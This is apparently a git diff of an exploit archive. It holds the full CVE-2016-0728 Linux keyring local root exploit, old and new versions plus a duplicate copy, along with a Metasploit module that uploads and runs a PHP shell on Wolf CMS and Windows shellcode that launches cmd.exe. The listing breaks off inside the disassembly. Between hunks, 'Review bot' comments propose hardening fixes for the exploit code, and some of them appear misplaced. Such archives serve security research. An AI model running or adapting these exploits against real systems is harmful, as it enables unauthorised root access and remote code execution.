 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0
 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80
@@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port
 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
-39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
+39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443
 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
@@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port
 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
 39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
-39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
+39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
 39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
 39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
-39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604
+39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0
 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
@@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port
 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80
+39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
+40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
+40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0
diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c
index bcee599b4..1e3e01f7a 100755
--- a/platforms/linux/local/39277.c
+++ b/platforms/linux/local/39277.c
@@ -5,12 +5,10 @@
 # CVE : CVE-2016-0728
 */
-/* CVE-2016-0728 local root exploit
- modified by Federico Bento to read kernel symbols from /proc/kallsyms
- props to grsecurity/PaX for preventing this in so many ways
+/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
+/* $ ./cve_2016_072 PP_KEY */
- $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
- $ ./cve_2016_072 PP_KEY */
+/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */
 #include
 #include
@@ -30,183 +28,143 @@ _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; #define STRUCT_LEN (0xb8 - 0x30) -#define COMMIT_CREDS_ADDR (0xffffffff810bb050) -#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) +#define COMMIT_CREDS_ADDR (0xffffffff81094250) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550) struct key_type { char * name; - size_t datalen; - void * vet_description; - void * preparse; - void * free_preparse; - void * instantiate; - void * update; - void * match_preparse; - void * match_free; - void * revoke; - void * destroy; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; }; -/* thanks spender - Federico Bento */ -static unsigned long get_kernel_sym(char *name) -{ - FILE *f; - unsigned long addr; - char dummy; - char sname[256]; - int ret; - - f = fopen("/proc/kallsyms", "r"); - if (f == NULL) { - fprintf(stdout, "Unable to obtain symbol listing!\n"); - exit(0); - } - - ret = 0; - while(ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); - if (ret == 0) { - fscanf(f, "%s\n", sname); - continue; - } - if (!strcmp(name, sname)) { - fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); - fclose(f); - return addr; - } - } - - fclose(f); - return 0; -} - void userspace_revoke(void * key) { - commit_creds(prepare_kernel_cred(0)); + commit_creds(prepare_kernel_cred(0)); } int main(int argc, const char *argv[]) { - const char *keyring_name; - size_t i = 0; - unsigned long int l = 0x100000000/2; - key_serial_t serial = -1; - pid_t pid = -1; - struct key_type * my_key_type = NULL; + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + +struct { long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; 
- struct { - long mtype; - char mtext[STRUCT_LEN]; - } msg = {0x4141414141414141, {0}}; - int msqid; + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } - if (argc != 2) { - puts("usage: ./keys "); - return 1; + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds) COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR; + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); } - printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); - commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); - prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); - if(commit_creds == NULL || prepare_kernel_cred == NULL) { - commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; - prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; - if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) - puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + 
perror("keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } } - my_key_type = malloc(sizeof(*my_key_type)); + puts("finished increfing"); + puts("forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("fork"); + return -1; + } - my_key_type->revoke = (void*)userspace_revoke; - memset(msg.mtext, 'A', sizeof(msg.mtext)); - - // key->uid - *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ - //key->perm - *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; - - //key->type - *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; - - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("msgget"); + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("msgsnd"); + exit(1); + } + } + sleep(-1); exit(1); } + } + + puts("finished forking"); + sleep(5); - keyring_name = argv[1]; - - /* Set the new session keyring before we start */ - - serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); - if (serial < 0) { - perror("keyctl"); - return -1; - } - - if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { - perror("keyctl"); - return -1; + /* call userspace_revoke from kernel */ + puts("caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("keyctl_revoke"); } + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); - puts("[+] Increfing..."); - for (i = 1; i < 0xfffffffd; i++) { - if (i == (0xffffffff - l)) { - l = l/2; - sleep(5); - } - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - 
perror("[-] keyctl"); - return -1; - } - } - sleep(5); - /* here we are going to leak the last references to overflow */ - for (i=0; i<5; ++i) { - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - - puts("[+] Finished increfing"); - puts("[+] Forking..."); - /* allocate msg struct in the kernel rewriting the freed keyring object */ - for (i=0; i<64; i++) { - pid = fork(); - if (pid == -1) { - perror("[-] fork"); - return -1; - } - - if (pid == 0) { - sleep(2); - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("[-] msgget"); - exit(1); - } - for (i = 0; i < 64; i++) { - if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { - perror("[-] msgsnd"); - exit(1); - } - } - sleep(-1); - exit(1); - } - } - - puts("[+] Finished forking"); - sleep(5); - - /* call userspace_revoke from kernel */ - puts("[+] Caling revoke..."); - if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { - perror("[+] keyctl_revoke"); - } - - printf("uid=%d, euid=%d\n", getuid(), geteuid()); - execl("/bin/sh", "/bin/sh", NULL); - - return 0; + return 0; } \ No newline at end of file diff --git a/platforms/linux/local/40003.c b/platforms/linux/local/40003.c new file mode 100755 index 000000000..bcee599b4 --- /dev/null +++ b/platforms/linux/local/40003.c 
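Review bot: On the new side `my_key_type = malloc(sizeof(*my_key_type));` is dereferenced on the very next statement (`my_key_type->revoke = ...`) without a NULL check; add `if (my_key_type == NULL) { perror("malloc"); return 1; }` between the two lines. In the forked child, `sleep(-1);` passes a negative constant to a parameter of type `unsigned int`, which silently converts to `UINT_MAX`; `pause();` states the intent (block until a signal arrives) without the implicit conversion. The same two lines are present in the old side and in the copy this commit adds as `platforms/linux/local/40003.c`, so both files need the fix. `main` starts and ends inside this hunk.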
@@ -0,0 +1,212 @@ +/* +# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings +# Date: 19/1/2016 +# Exploit Author: Perception Point Team +# CVE : CVE-2016-0728 +*/ + +/* CVE-2016-0728 local root exploit + modified by Federico Bento to read kernel symbols from /proc/kallsyms + props to grsecurity/PaX for preventing this in so many ways + + $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall + $ ./cve_2016_072 PP_KEY */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); +_commit_creds commit_creds; +_prepare_kernel_cred prepare_kernel_cred; + +#define STRUCT_LEN (0xb8 - 0x30) +#define COMMIT_CREDS_ADDR (0xffffffff810bb050) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) + + + +struct key_type { + char * name; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; +}; + +/* thanks spender - Federico Bento */ +static unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + fprintf(stdout, "Unable to obtain symbol listing!\n"); + exit(0); + } + + ret = 0; + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); + fclose(f); + return addr; + } + } + + fclose(f); + return 0; +} + +void userspace_revoke(void * key) { + commit_creds(prepare_kernel_cred(0)); +} + +int main(int argc, const char *argv[]) { + const char *keyring_name; + size_t i = 0; + unsigned 
long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + + struct { + long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; + + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } + + printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); + prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); + if(commit_creds == NULL || prepare_kernel_cred == NULL) { + commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; + if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) + puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + } + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("[+] Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to 
overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + + puts("[+] Finished increfing"); + puts("[+] Forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("[-] fork"); + return -1; + } + + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("[-] msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("[-] msgsnd"); + exit(1); + } + } + sleep(-1); + exit(1); + } + } + + puts("[+] Finished forking"); + sleep(5); + + /* call userspace_revoke from kernel */ + puts("[+] Caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("[+] keyctl_revoke"); + } + + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); + + return 0; +} \ No newline at end of file diff --git a/platforms/php/remote/40004.rb b/platforms/php/remote/40004.rb new file mode 100755 index 000000000..c437b6ee3 --- /dev/null +++ b/platforms/php/remote/40004.rb 
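Review bot: In `get_kernel_sym`, `fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname)` and the recovery call `fscanf(f, "%s\n", sname)` both use an unbounded `%s` into `char sname[256]`, so a symbol name of 256 or more characters overflows the stack buffer; use `%255s` in both format strings. The same first call writes a `void *` through `(void **)&addr` into an `unsigned long`, which only works where the two types have the same size; `"%lx %c %255s"` with `&addr` reads the address directly. The `fopen` failure path calls `exit(0)`, reporting success to the calling shell even though nothing was resolved; `exit(1)` matches the other error paths in this file, and the return value of the recovery `fscanf` is discarded and should be checked like the first. `get_kernel_sym` begins and ends inside this hunk.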
@@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in Wolfcms + version 0.8.2. This application has an upload feature that + allows an authenticated user with administrator roles to upload + arbitrary files to the '/public' directory. + }, + 'Author' => [ + 'Narendra Bhati', # Proof of concept + 'Rahmat Nurfauzi' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-6568'], + ['CVE', '2015-6567'], + ['OSVDB','126852'], + ['EDB', '38000'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Wolfcms <= 0.8.2', {}] + ], + 'DisclosureDate' => 'Aug 28 2015', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']), + OptString.new('USER', [true, 'User to login with', '']), + OptString.new('PASS', [true, 'Password to login with', '']), + ], self.class) + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/?/admin/login/login/"), + 'vars_post' => { + "login[username]" => datastore['USER'], + "login[password]" => datastore['PASS'], + "login[redirect]" => "/wolfcms/?/admin" + } + }) + return res + end + + def exploit + + upload_name = rand_text_alpha(5 + rand(5)) + '.php' + + get_cookie = login.get_cookies + cookie = get_cookie.split(";")[3] + + token = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/") + }) + + html = token.body + 
if html =~ /Files/ + print_status("Login successfuly") + end + csrf_token = html.scan(/ 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary, + 'Cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/") + }) + + register_file_for_cleanup(upload_name) + + print_status("#{peer} - Executing shell...") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "public",upload_name), + }) + + end +end \ No newline at end of file diff --git a/platforms/win32/shellcode/40005.c b/platforms/win32/shellcode/40005.c new file mode 100755 index 000000000..0779cd475 --- /dev/null +++ b/platforms/win32/shellcode/40005.c 
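Review bot: `get_cookie = login.get_cookies` and `cookie = get_cookie.split(";")[3]` assume that `send_request_cgi` returned a response and that the session cookie is always the fourth `;`-separated element; a connection failure makes `login` return `nil` and raises `NoMethodError` here, and any change in the number or order of cookies selects the wrong one. Guard with `res = login; fail_with(Failure::Unreachable, 'No response to login request') if res.nil?` and select the cookie by name rather than by position. The `if html =~ /Files/` check only prints `"Login successfuly"` (sic) on success; the missing else branch should `fail_with(Failure::NoAccess, 'Login failed')` instead of proceeding to the upload with an unusable cookie. `"login[redirect]" => "/wolfcms/?/admin"` hard-codes the default `TARGETURI` rather than deriving it from `target_uri`. The stretch between `html.scan(/` and `'POST'` appears truncated in this listing, so the multipart body construction could not be reviewed.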
@@ -0,0 +1,273 @@ +/* + + # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode + # Date : 22-06-2016 + # Author : Roziul Hasan Khan Shifat + # Tested on : Windows 7,10 x86 + +*/ + + +/* + +section .text + global _start +_start: +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;EAX=PEB +mov eax,[eax+0xc] ;EAX=PEB->Ldr +mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList +lodsd ; EAX=ntdll.dll +xchg eax,esi ;EAX=ESI , ESI=EAX +lodsd ; EAX=Third(kernel32) +mov ebx,[eax+0x10] ;PVOID Dllbase (base address) + +;------------------------------- + +mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew +add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header +mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress +add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) +mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames +add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames +xor ecx,ecx +;----------------------- + +Get_func: +inc ecx ;increment the ordinal +lodsd ;Get name offset +add eax,ebx ;(offset+kernel32.dll base adress)=Get function name +cmp dword [eax],0x50746547 ;GetP +jnz Get_func +cmp dword [eax+0x4],0x41636f72 ;rocA +jnz Get_func +cmp dword [eax+0x8],0x65726464 ;ddre +jnz Get_func + +;--------------------- + +mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals + +add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll + +mov cx,[esi+ecx*2] ;CX=Number of Function +dec ecx +mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions + +add esi,ebx ;ESI=beginning of Address table +mov edx,[esi+ecx*4];EDX=Pointer(offset) +add edx,ebx ;Edx=GetProcAddress + +;----------------------------- +xor esi,esi +mov esi,edx ;backup of GetProcAddress +xor edi,edi +mov edi,ebx +;-------------- + +;finding address of LoadLibraryA() +xor ecx,ecx +push ecx + 
+push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ebx ;address of kernel32.dll + +call edx + +add esp,12 +;----------------- +xor ecx,ecx +;finding address of ExitProcess +push 0x42737365 +mov [esp+3],cl +push 0x636f7250 +push 0x74697845 +push esp +push edi +xor edi,edi +mov edi,eax +call esi + +;---------------------------- +add esp,12 +;LoadLibraryA("shell32.dll") +xor ecx,ecx +push ecx +push 0x416c6c64 +mov [esp+3],cl +push 0x2e32336c +push 0x6c656873 + +push esp +xor edx,edx +mov edx,edi ;Edx=LoadLibraryA +mov edi,eax ;edi=ExitProcess +call edx +add esp,11 +;------------------ + +;finding address of ShellExecuteA() +xor ecx,ecx +push 0x42424241 +mov [esp+1],cl + +push 0x65747563 +push 0x6578456c +push 0x6c656853 + +push esp +push eax + +call esi +;------------------- +;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); +add esp,13 +xor ecx,ecx +push 0x41657865 +mov [esp+3],cl +push 0x2e646d63 + +push esp +pop ecx + + +xor edx,edx +inc edx + +push edx +xor edx,edx +push edx +push edx + +push ecx +push edx +push edx + +call eax + +call edi + +*/ + + +/* + +Disassembly of section .text: + +00401000 <_start>: + 401000: 31 c9 xor %ecx,%ecx + 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 401006: 8b 40 0c mov 0xc(%eax),%eax + 401009: 8b 70 14 mov 0x14(%eax),%esi + 40100c: ad lods %ds:(%esi),%eax + 40100d: 96 xchg %eax,%esi + 40100e: ad lods %ds:(%esi),%eax + 40100f: 8b 58 10 mov 0x10(%eax),%ebx + 401012: 8b 53 3c mov 0x3c(%ebx),%edx + 401015: 01 da add %ebx,%edx + 401017: 8b 52 78 mov 0x78(%edx),%edx + 40101a: 01 da add %ebx,%edx + 40101c: 8b 72 20 mov 0x20(%edx),%esi + 40101f: 01 de add %ebx,%esi + 401021: 31 c9 xor %ecx,%ecx + +00401023 : + 401023: 41 inc %ecx + 401024: ad lods %ds:(%esi),%eax + 401025: 01 d8 add %ebx,%eax + 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 40102d: 75 f4 jne 401023 + 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 401036: 75 eb jne 401023 + 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 40103f: 
75 e2 jne 401023 + 401041: 8b 72 24 mov 0x24(%edx),%esi + 401044: 01 de add %ebx,%esi + 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx + 40104a: 49 dec %ecx + 40104b: 8b 72 1c mov 0x1c(%edx),%esi + 40104e: 01 de add %ebx,%esi + 401050: 8b 14 8e mov (%esi,%ecx,4),%edx + 401053: 01 da add %ebx,%edx + 401055: 31 f6 xor %esi,%esi + 401057: 89 d6 mov %edx,%esi + 401059: 31 ff xor %edi,%edi + 40105b: 89 df mov %ebx,%edi + 40105d: 31 c9 xor %ecx,%ecx + 40105f: 51 push %ecx + 401060: 68 61 72 79 41 push $0x41797261 + 401065: 68 4c 69 62 72 push $0x7262694c + 40106a: 68 4c 6f 61 64 push $0x64616f4c + 40106f: 54 push %esp + 401070: 53 push %ebx + 401071: ff d2 call *%edx + 401073: 83 c4 0c add $0xc,%esp + 401076: 31 c9 xor %ecx,%ecx + 401078: 68 65 73 73 42 push $0x42737365 + 40107d: 88 4c 24 03 mov %cl,0x3(%esp) + 401081: 68 50 72 6f 63 push $0x636f7250 + 401086: 68 45 78 69 74 push $0x74697845 + 40108b: 54 push %esp + 40108c: 57 push %edi + 40108d: 31 ff xor %edi,%edi + 40108f: 89 c7 mov %eax,%edi + 401091: ff d6 call *%esi + 401093: 83 c4 0c add $0xc,%esp + 401096: 31 c9 xor %ecx,%ecx + 401098: 51 push %ecx + 401099: 68 64 6c 6c 41 push $0x416c6c64 + 40109e: 88 4c 24 03 mov %cl,0x3(%esp) + 4010a2: 68 6c 33 32 2e push $0x2e32336c + 4010a7: 68 73 68 65 6c push $0x6c656873 + 4010ac: 54 push %esp + 4010ad: 31 d2 xor %edx,%edx + 4010af: 89 fa mov %edi,%edx + 4010b1: 89 c7 mov %eax,%edi + 4010b3: ff d2 call *%edx + 4010b5: 83 c4 0b add $0xb,%esp + 4010b8: 31 c9 xor %ecx,%ecx + 4010ba: 68 41 42 42 42 push $0x42424241 + 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) + 4010c3: 68 63 75 74 65 push $0x65747563 + 4010c8: 68 6c 45 78 65 push $0x6578456c + 4010cd: 68 53 68 65 